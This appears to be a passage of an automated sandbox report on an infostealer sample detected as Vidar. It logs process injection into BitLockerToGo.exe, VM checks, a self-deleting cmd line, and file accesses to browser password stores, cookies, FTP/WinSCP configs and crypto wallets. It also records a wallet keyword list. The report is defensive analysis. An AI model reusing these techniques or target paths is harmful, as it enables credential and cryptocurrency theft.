Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run			Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Source: C:\Users\user\Desktop\updater.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\timeout.exe TID: 2984

Thread sleep count: 84 > 30

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: chrome.exe, 00000005.00000002.2651284879.000012B000074000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware
Source: chrome.exe, 00000005.00000002.2653849494.000012B000290000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=a72f2be5-9dcd-48f3-b1ef-8b3b2487978e
Source: knyukx.3.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: knyukx.3.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: knyukx.3.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: knyukx.3.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: knyukx.3.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: knyukx.3.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: BitLockerToGo.exe, 00000003.00000002.3090094818.0000000002E8B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2874398480.0000000002E86000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3090094818.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: chrome.exe, 00000005.00000002.2643313924.000001C8F45F0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: msedge.exe, 00000009.00000003.2685545742.000018A000314000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware20,1(
Source: knyukx.3.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: knyukx.3.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: knyukx.3.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: knyukx.3.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: knyukx.3.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: knyukx.3.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: knyukx.3.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: knyukx.3.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: knyukx.3.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: updater.exe, 00000000.00000002.2452416127.000000000194D000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000009.00000002.2704841013.000001F1C4A43000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000000D.00000002.2883799060.000002070FA43000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: knyukx.3.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: knyukx.3.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: knyukx.3.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: knyukx.3.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: chrome.exe, 00000005.00000002.2643313924.000001C8F4614000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_
Source: knyukx.3.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: chrome.exe, 00000005.00000002.2641380055.000001C8F0A6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllbb#qP
Source: chrome.exe, 00000005.00000002.2660340819.000012B00111C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware Virtual USB Mouse4
Source: knyukx.3.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: knyukx.3.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: knyukx.3.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: knyukx.3.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: knyukx.3.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: knyukx.3.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: knyukx.3.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: knyukx.3.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: BitLockerToGo.exe, 00000003.00000002.3090094818.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: od_VMware_SATA_C
Source: knyukx.3.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: knyukx.3.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: knyukx.3.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Process information queried: ProcessInformation

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\updater.exe

Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\updater.exe

Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\updater.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2C47008	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 419000	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 41D000	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 41F000	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 420000	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 421000	Jump to behavior

Source: C:\Users\user\Desktop\updater.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\vs268" & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\updater.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Vidar stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 00000000.00000002.2454538216.000000000BF16000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2454538216.000000000BE20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2454538216.000000000BDE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3089686713.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2454538216.000000000BE00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2454538216.000000000BE40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: updater.exe PID: 5624, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BitLockerToGo.exe PID: 6584, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: BitLockerToGo.exe, 00000003.00000002.3090094818.0000000002E66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Electrum-LTC\wallets\
Source: BitLockerToGo.exe, 00000003.00000002.3090094818.0000000002E66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \ElectronCash\wallets\
Source: BitLockerToGo.exe, 00000003.00000002.3090094818.0000000002E66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Electrum\wallets\
Source: BitLockerToGo.exe, 00000003.00000002.3090094818.0000000002E66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: BitLockerToGo.exe, 00000003.00000002.3090094818.0000000002E66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: exodus.conf.json
Source: BitLockerToGo.exe, 00000003.00000002.3090094818.0000000002E66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: BitLockerToGo.exe, 00000003.00000002.3090094818.0000000002E8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: info.seco
Source: BitLockerToGo.exe, 00000003.00000002.3090094818.0000000002E8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ElectrumLTC
Source: BitLockerToGo.exe, 00000003.00000002.3090094818.0000000002E8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: passphrase.json
Source: BitLockerToGo.exe, 00000003.00000002.3090094818.0000000002E8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\
Source: BitLockerToGo.exe, 00000003.00000002.3090094818.0000000002E66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: BitLockerToGo.exe, 00000003.00000002.3094935239.0000000005E7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: k"wallet.,seed.,btc.,key.,2fa.,crypto.,coin.,private.,2fa.,auth.,ledger.,trezor.,pass.,wal.,upbit.,bcex.,bithimb.,hitbtc.,bitflyer.,kucoin.,huobi.,poloniex.,kraken.,okex.,binance.,bitfinex.,gdax.,ethereum.,exodus.,metamask.,myetherwallet.,electrum.,bitcoin.,blockchain.,coinomi.,words.,meta.,mask.,eth.,recovery.
Source: BitLockerToGo.exe, 00000003.00000002.3090094818.0000000002E8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: BitLockerToGo.exe, 00000003.00000002.3090094818.0000000002E66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: multidoge.wallet
Source: BitLockerToGo.exe, 00000003.00000002.3090094818.0000000002E66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: BitLockerToGo.exe, 00000003.00000002.3090094818.0000000002E8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: seed.seco
Source: BitLockerToGo.exe, 00000003.00000002.3090094818.0000000002E8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore
Source: BitLockerToGo.exe, 00000003.00000002.3090094818.0000000002E66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Electrum-LTC\wallets\

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\key4.db	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.db	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.db	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\temporary\key4.db	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.db	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\sessionstore-backups\key4.db	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.db	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\bookmarkbackups\key4.db	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived\2023-10\key4.db	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\to-be-removed\key4.db	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\db\key4.db	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\events\key4.db	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\security_state\key4.db	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\key4.db	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\key4.db	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\key4.db	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.db	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\key4.db	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.db	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\pending_pings\key4.db	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\key4.db	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\key4.db	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\saved-telemetry-pings\key4.db	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\minidumps\key4.db	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\events\key4.db	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\default\key4.db	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\tmp\key4.db	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived\key4.db	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\key4.db	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.db	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
